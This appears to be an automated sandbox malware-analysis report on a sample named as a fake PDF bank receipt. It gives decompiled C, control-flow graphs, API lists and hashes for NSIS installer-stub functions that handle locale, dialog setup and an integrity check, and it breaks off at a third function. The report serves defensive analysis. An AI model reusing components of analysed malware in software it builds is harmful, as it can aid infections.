                                                                                              Function 00403D17 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215stringregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d3c GetUserDefaultUILanguage call 4065af 301->304 305 403d43-403d7a call 406536 301->305 308 403d41 304->308 311 403d92-403d98 lstrcatW 305->311 312 403d7c-403d8d call 406536 305->312 310 403d9d-403dc6 call 403fed call 40603f 308->310 318 403e58-403e60 call 40603f 310->318 319 403dcc-403dd1 310->319 311->310 312->311 325 403e62-403e69 call 4066a5 318->325 326 403e6e-403e93 LoadImageW 318->326 319->318 321 403dd7-403dff call 406536 319->321 321->318 327 403e01-403e05 321->327 325->326 329 403f14-403f1c call 40140b 326->329 330 403e95-403ec5 RegisterClassW 326->330 331 403e17-403e23 lstrlenW 327->331 332 403e07-403e14 call 405f64 327->332 343 403f26-403f31 call 403fed 329->343 344 403f1e-403f21 329->344 333 403fe3 330->333 334 403ecb-403f0f SystemParametersInfoW CreateWindowExW 330->334 338 403e25-403e33 lstrcmpiW 331->338 339 403e4b-403e53 call 405f37 call 406668 331->339 332->331 337 403fe5-403fec 333->337 334->329 338->339 342 403e35-403e3f GetFileAttributesW 338->342 339->318 346 403e41-403e43 342->346 347 403e45-403e46 call 405f83 342->347 353 403f37-403f51 ShowWindow call 4069c5 343->353 354 403fba-403fbb call 40579d 343->354 344->337 346->339 346->347 347->339 359 403f53-403f58 call 4069c5 353->359 360 403f5d-403f6f GetClassInfoW 353->360 358 403fc0-403fc2 354->358 361 403fc4-403fca 358->361 362 403fdc-403fde call 40140b 358->362 359->360 365 403f71-403f81 GetClassInfoW RegisterClassW 360->365 366 403f87-403faa DialogBoxParamW call 40140b 360->366 361->344 367 403fd0-403fd7 call 40140b 361->367 362->333 365->366 371 403faf-403fb8 call 403c67 366->371 367->344 371->337
                                                                                              C-Code - Quality: 96%
                                                                                              			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x470270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x446748;
					 *0x4d1000 = 0x30;
					 *0x4d1002 = 0x78;
					 *0x4d1004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x446748, 0);
					__eflags =  *0x446748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x446748, 0);
					}
					lstrcatW(0x4d1000, _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004065AF(0x4d1000, _t73 & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				 *0x4702e0 =  *0x470278 & 0x00000020;
				 *0x4702fc = 0x10000;
				if(E0040603F(_t90, 0x4c5000) != 0) {
					L16:
					if(E0040603F(_t98, 0x4c5000) == 0) {
						E004066A5(_t76, 0, _t82, 0x4c5000,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x470260, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x468248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x470300;
							if( *0x470300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x46822c;
								if( *0x46822c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x446728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x468200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x468200);
								 *0x468224 = _t87;
								RegisterClassW(0x468200);
							}
							_t44 = DialogBoxParamW( *0x470260,  *0x468240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), "true");
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x470260;
						 *0x468204 = E00401000;
						 *0x468210 =  *0x470260;
						 *0x468214 = _t30;
						 *0x468224 = 0x40a3b4;
						if(RegisterClassW(0x468200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x446728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x470260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x460200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x470298 + _t78 * 2,  *0x470298 +  *(_t82 + 0x4c) * 2, 0x460200, 0);
					_t63 =  *0x460200; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x460202;
						 *((short*)(E00405F64(0x460202, "true"))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(0x4c5000, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                              0x00403d1d
                                                                                              0x00403d26
                                                                                              0x00403d2d
                                                                                              0x00403d2f
                                                                                              0x00403d43
                                                                                              0x00403d55
                                                                                              0x00403d5e
                                                                                              0x00403d67
                                                                                              0x00403d6e
                                                                                              0x00403d73
                                                                                              0x00403d7a
                                                                                              0x00403d8d
                                                                                              0x00403d8d
                                                                                              0x00403d98
                                                                                              0x00403d31
                                                                                              0x00403d31
                                                                                              0x00403d3c
                                                                                              0x00403d3c
                                                                                              0x00403d9d
                                                                                              0x00403db0
                                                                                              0x00403db5
                                                                                              0x00403dc6
                                                                                              0x00403e58
                                                                                              0x00403e60
                                                                                              0x00403e69
                                                                                              0x00403e69
                                                                                              0x00403e7f
                                                                                              0x00403e85
                                                                                              0x00403e93
                                                                                              0x00403f14
                                                                                              0x00403f1c
                                                                                              0x00403f26
                                                                                              0x00403f2b
                                                                                              0x00403f31
                                                                                              0x00403fbb
                                                                                              0x00403fc0
                                                                                              0x00403fc2
                                                                                              0x00403fde
                                                                                              0x00000000
                                                                                              0x00403fde
                                                                                              0x00403fc4
                                                                                              0x00403fca
                                                                                              0x00403fd2
                                                                                              0x00403fd2
                                                                                              0x00000000
                                                                                              0x00403fca
                                                                                              0x00403f3f
                                                                                              0x00403f4a
                                                                                              0x00403f4f
                                                                                              0x00403f51
                                                                                              0x00403f58
                                                                                              0x00403f58
                                                                                              0x00403f63
                                                                                              0x00403f6b
                                                                                              0x00403f6d
                                                                                              0x00403f6f
                                                                                              0x00403f78
                                                                                              0x00403f7b
                                                                                              0x00403f81
                                                                                              0x00403f81
                                                                                              0x00403fa0
                                                                                              0x00403fb1
                                                                                              0x00000000
                                                                                              0x00403fb6
                                                                                              0x00403f1e
                                                                                              0x00403f20
                                                                                              0x00000000
                                                                                              0x00403e95
                                                                                              0x00403e95
                                                                                              0x00403ea1
                                                                                              0x00403eab
                                                                                              0x00403eb1
                                                                                              0x00403eb6
                                                                                              0x00403ec5
                                                                                              0x00403fe3
                                                                                              0x00403fe3
                                                                                              0x00000000
                                                                                              0x00403fe3
                                                                                              0x00403ed4
                                                                                              0x00403f0f
                                                                                              0x00000000
                                                                                              0x00403f0f
                                                                                              0x00403dcc
                                                                                              0x00403dcc
                                                                                              0x00403dcf
                                                                                              0x00403dd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403ddf
                                                                                              0x00403df1
                                                                                              0x00403df6
                                                                                              0x00403dff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e05
                                                                                              0x00403e07
                                                                                              0x00403e14
                                                                                              0x00403e14
                                                                                              0x00403e1d
                                                                                              0x00403e23
                                                                                              0x00403e4b
                                                                                              0x00403e53
                                                                                              0x00000000
                                                                                              0x00403e35
                                                                                              0x00403e36
                                                                                              0x00403e3f
                                                                                              0x00403e45
                                                                                              0x00403e46
                                                                                              0x00000000
                                                                                              0x00403e46
                                                                                              0x00403e41
                                                                                              0x00403e43
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e43
                                                                                              0x00403e23

                                                                                              APIs
                                                                                                • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,763F3420,004D5000,?,00000000,?), ref: 00403D31
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              • lstrcatW.KERNEL32(004D1000,00446748), ref: 00403D98
                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,004C5000,004D1000,00446748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446748,00000000,00000002,763F3420), ref: 00403E18
                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,004C5000,004D1000,00446748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446748,00000000), ref: 00403E2B
                                                                                              • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,004C5000), ref: 00403E7F
                                                                                              • RegisterClassW.USER32(00468200), ref: 00403EBC
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                                              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00468200), ref: 00403F6B
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00468200), ref: 00403F78
                                                                                              • RegisterClassW.USER32(00468200), ref: 00403F81
                                                                                              • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Call$Control Panel\Desktop\ResourceLocale$HgD$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 606308-344305029
                                                                                              • Opcode ID: d22b893b00c9736c3dabf2cc5a44c2f6f7e48ce1e6a11fbf6dc9e9d70c61186e
                                                                                              • Instruction ID: 9dea7b71855a091a9fc58e9776c06297b5e3adb2bb06172a3bfe2df5a3e7a6f1
                                                                                              • Opcode Fuzzy Hash: d22b893b00c9736c3dabf2cc5a44c2f6f7e48ce1e6a11fbf6dc9e9d70c61186e
                                                                                              • Instruction Fuzzy Hash: 8961E570140301BAD720AF66AD49F2B3AACEB85B49F00457FF945B21E2DB7D8D418A2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 374 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 377 403120-403125 374->377 378 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 374->378 379 40336a-40336e 377->379 386 403243-403251 call 40302e 378->386 387 40315e 378->387 393 403322-403327 386->393 394 403257-40325a 386->394 389 403163-40317a 387->389 391 40317c 389->391 392 40317e-403187 call 4035e2 389->392 391->392 400 40318d-403194 392->400 401 4032de-4032e6 call 40302e 392->401 393->379 396 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 394->396 397 40325c-403274 call 4035f8 call 4035e2 394->397 421 4032d4-4032d9 396->421 422 4032e8-403318 call 4035f8 call 403371 396->422 397->393 423 40327a-403280 397->423 405 403210-403214 400->405 406 403196-4031aa call 406113 400->406 401->393 410 403216-40321d call 40302e 405->410 411 40321e-403224 405->411 406->411 426 4031ac-4031b3 406->426 410->411 416 403233-40323b 411->416 417 403226-403230 call 406b22 411->417 416->389 420 403241 416->420 417->416 420->386 421->379 435 40331d-403320 422->435 423->393 423->396 426->411 429 4031b5-4031bc 426->429 429->411 430 4031be-4031c5 429->430 430->411 432 4031c7-4031ce 430->432 432->411 434 4031d0-4031f0 432->434 434->393 436 4031f6-4031fa 434->436 435->393 437 403329-40333a 435->437 438 403202-40320a 436->438 439 4031fc-403200 436->439 440 403342-403347 437->440 441 40333c 437->441 438->411 442 40320c-40320e 438->442 439->420 439->438 443 403348-40334e 440->443 441->440 442->411 443->443 444 403350-403368 call 406113 443->444 444->379
                                                                                              C-Code - Quality: 99%
                                                                                              			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x47026c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x4dd000, 0x2000);
				_t106 = E00406158(0x4dd000, 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x4cd000, 0x4dd000);
				E00406668(0x4e1000, E00405F83(0x4cd000));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x432700 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E("true");
					__eflags =  *0x470274 - _t94;
					if( *0x470274 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x41e668);
						E00406187(0x41e668,  &_v560, 0x4d5000); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x470274 + 0x1c);
							 *0x432704 = _t65;
							 *0x4326f8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x470270 = _t111;
								 *0x470278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x47027c =  *0x47027c + 1;
									__eflags =  *0x47027c;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x4326f4; // 0xa503e
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00406113(0x470280, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x4326f0);
					_t77 = E004035E2( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x470274) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E004035E2(0x42a6f0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E0040302E("true");
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x470274;
						if( *0x470274 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x42a6f0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x4326f0; // 0x1587a
						 *0x470300 =  *0x470300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x470274 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x432700; // 0x17e0e
						if(__eflags < 0) {
							_v8 = E00406B22(_v8, 0x42a6f0, _t107);
						}
						 *0x4326f0 =  *0x4326f0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}
































                                                                                              0x004030db
                                                                                              0x004030de
                                                                                              0x004030e1
                                                                                              0x004030fb
                                                                                              0x00403100
                                                                                              0x00403113
                                                                                              0x00403118
                                                                                              0x0040311e
                                                                                              0x00000000
                                                                                              0x00403120
                                                                                              0x00403131
                                                                                              0x00403142
                                                                                              0x00403149
                                                                                              0x0040314f
                                                                                              0x00403151
                                                                                              0x00403156
                                                                                              0x00403158
                                                                                              0x00403243
                                                                                              0x00403245
                                                                                              0x0040324a
                                                                                              0x00403251
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403257
                                                                                              0x0040325a
                                                                                              0x00403286
                                                                                              0x0040328b
                                                                                              0x00403296
                                                                                              0x00403298
                                                                                              0x004032a9
                                                                                              0x004032c4
                                                                                              0x004032ca
                                                                                              0x004032cd
                                                                                              0x004032d2
                                                                                              0x004032f1
                                                                                              0x00403301
                                                                                              0x00403313
                                                                                              0x00403318
                                                                                              0x0040331d
                                                                                              0x00403320
                                                                                              0x00403329
                                                                                              0x0040332d
                                                                                              0x00403335
                                                                                              0x0040333a
                                                                                              0x0040333c
                                                                                              0x0040333c
                                                                                              0x0040333c
                                                                                              0x00403344
                                                                                              0x00403344
                                                                                              0x00403347
                                                                                              0x00403348
                                                                                              0x00403348
                                                                                              0x0040334b
                                                                                              0x0040334d
                                                                                              0x0040334d
                                                                                              0x0040334d
                                                                                              0x00403350
                                                                                              0x00403357
                                                                                              0x00403363
                                                                                              0x00403368
                                                                                              0x00000000
                                                                                              0x00403368
                                                                                              0x00000000
                                                                                              0x00403320
                                                                                              0x00000000
                                                                                              0x004032d4
                                                                                              0x00403262
                                                                                              0x0040326d
                                                                                              0x00403272
                                                                                              0x00403274
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040327d
                                                                                              0x00403280
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040315e
                                                                                              0x00403163
                                                                                              0x00403168
                                                                                              0x0040316c
                                                                                              0x00403173
                                                                                              0x00403178
                                                                                              0x0040317a
                                                                                              0x0040317c
                                                                                              0x0040317c
                                                                                              0x00403180
                                                                                              0x00403185
                                                                                              0x00403187
                                                                                              0x004032e0
                                                                                              0x00403322
                                                                                              0x00000000
                                                                                              0x00403322
                                                                                              0x0040318d
                                                                                              0x00403194
                                                                                              0x00403210
                                                                                              0x00403214
                                                                                              0x00403218
                                                                                              0x0040321d
                                                                                              0x00000000
                                                                                              0x00403214
                                                                                              0x0040319d
                                                                                              0x004031a2
                                                                                              0x004031a5
                                                                                              0x004031aa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031ac
                                                                                              0x004031b3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031b5
                                                                                              0x004031bc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031be
                                                                                              0x004031c5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031c7
                                                                                              0x004031ce
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031d0
                                                                                              0x004031d6
                                                                                              0x004031df
                                                                                              0x004031e5
                                                                                              0x004031e8
                                                                                              0x004031ea
                                                                                              0x004031f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031f6
                                                                                              0x004031fa
                                                                                              0x00403202
                                                                                              0x00403202
                                                                                              0x00403205
                                                                                              0x00403208
                                                                                              0x0040320a
                                                                                              0x0040320c
                                                                                              0x0040320c
                                                                                              0x00000000
                                                                                              0x0040320a
                                                                                              0x004031fc
                                                                                              0x00403200
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040321e
                                                                                              0x0040321e
                                                                                              0x00403224
                                                                                              0x00403230
                                                                                              0x00403230
                                                                                              0x00403233
                                                                                              0x00403239
                                                                                              0x00403239
                                                                                              0x00403239
                                                                                              0x00403241
                                                                                              0x00403241
                                                                                              0x00000000
                                                                                              0x00403241

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004030E4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004DD000,00002000), ref: 00403100
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,004DD000,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004E1000,00000000,004CD000,004CD000,004DD000,004DD000,80000000,00000003), ref: 00403149
                                                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                              Strings
                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
                                                                                              • Null, xrefs: 004031C7
                                                                                              • >P, xrefs: 00403350
                                                                                              • Inst, xrefs: 004031B5
                                                                                              • hA, xrefs: 00403291
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
                                                                                              • soft, xrefs: 004031BE
                                                                                              • Error launching installer, xrefs: 00403120
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                              • String ID: >P$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
                                                                                              • API String ID: 2803837635-2622253192
                                                                                              • Opcode ID: 9adf2b0bc2243993cb7948316c615c74caaffecf27dfc9f4f7777cec200279f1
                                                                                              • Instruction ID: 1bcc98e1504a37ecc5eb7fbfcd7f57d5c625885083fa168b6d57319d9c73866f
                                                                                              • Opcode Fuzzy Hash: 9adf2b0bc2243993cb7948316c615c74caaffecf27dfc9f4f7777cec200279f1
                                                                                              • Instruction Fuzzy Hash: 9971B171941204ABDB20DFA5DD85B9E3AACAB04316F20857FF905B72D2DB789E408B5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004066A5 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
